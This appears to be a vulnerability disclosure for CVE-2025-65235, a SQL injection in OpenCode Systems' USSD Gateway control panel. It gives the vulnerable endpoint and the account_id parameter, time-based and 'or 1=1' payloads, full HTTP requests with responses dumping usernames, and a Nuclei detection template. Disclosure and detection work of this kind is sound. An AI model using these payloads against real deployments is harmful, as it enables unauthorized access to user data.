[CVE-2025-65235] USSD GW SQL Injection - SubUsers

Technical information about the CVE-2025-65235 in OpenCode USSD GW application.

Description

SQL Injection in the USSD Gateway application offered by OpenCode Systems allows the user who has an access to the vulnerable function to dump the database by injecting SQL commands. https://www.cve.org/CVERecord?id=CVE-2025-65235

Application Details

• Name: USSD Gateway

• Vendor: OpenCode Systems

• Version: OC Release 5 - Version 6.13.11

Technical Details

• Vulnerable Endpoint: /occontrolpanel/index.php?w=occampaigns&op=SubUsers&op_func=getSubUsersByProvider

• Vulnerable Parameter: account_id

• Payload Sample: account_id=1; SELECT SLEEP(5)#

Exploitation

The default request is being used to get the username of the account details based on the account ID, the response is shown below

POST /occontrolpanel/index.php?w=occampaigns&op=SubUsers&op_func=getSubUsersByProvider HTTP/2
Host: DOMAIN
Cookie: OCPANEL-SESSIONID=9j[...]fmla; openid-state=65c[...]pao%22%3B%7D; _csrf=8643[...]63a_A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
[...]

account_id=1

HTTP/2 200 OK
[...]


{"1" :"USERNAME" }

By appending the payload to the parameter, all the usernames will be shown in the response.

You can use different payloads, the below one was used as a POC

POST /occontrolpanel/index.php?w=occampaigns&op=SubUsers&op_func=getSubUsersByProvider HTTP/2
Host: DOMAIN
Cookie: OCPANEL-SESSIONID=9j[...]fmla; openid-state=65c[...]pao%22%3B%7D; _csrf=8643[...]63a_A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
[...]

account_id=1\+or+1=1--+-

HTTP/2 200 OK
[...]

{ 
	"1" : "Username", "3" : "Username", "4" : "Username", "5" : "Username", "6" : "Username", "7" :"Username", "8" : "Username", "9" :"test Username" ," 10" :"Username" ,"11" :"Username" ," 12" :"Username" ,"13" :"Username" , " 14" :"mu[...]1","15":"mu[...]2" ,"16" :"mu[...]3" ,"17" :"mu[...]4" ,"18" :"mu[...]5"
	[...] 
}

Nuclei Template

You can use this template for easy detection.

id: ocpanel-ussdgw-sqli

info:
  name: USSD Gateway OCP Control Panel SQL Injection
  author: Eslam Ali Akl
  severity: high
  description: |
    Time-based SQL injection test for the getSubUsersByProvider endpoint.
    Injects a SLEEP(5) payload into the account_id parameter and flags the
    target if the response time indicates the SQL sleep was executed.
  tags: [sqli, time-based, ocpanel]

requests:
  - id: time_inject
    method: POST
    path:
      - "{{BaseURL}}/occontrolpanel/index.php?w=occampaigns&op=SubUsers&op_func=getSubUsersByProvider"
    headers:
      Content-Type: "application/x-www-form-urlencoded; charset=UTF-8"
      X-Requested-With: "XMLHttpRequest"
      User-Agent: "nuclei-scan"
    body: "account_id=1; SELECT SLEEP(5)#"
    matchers:
      - type: dsl
        dsl:
          - "duration >= 4"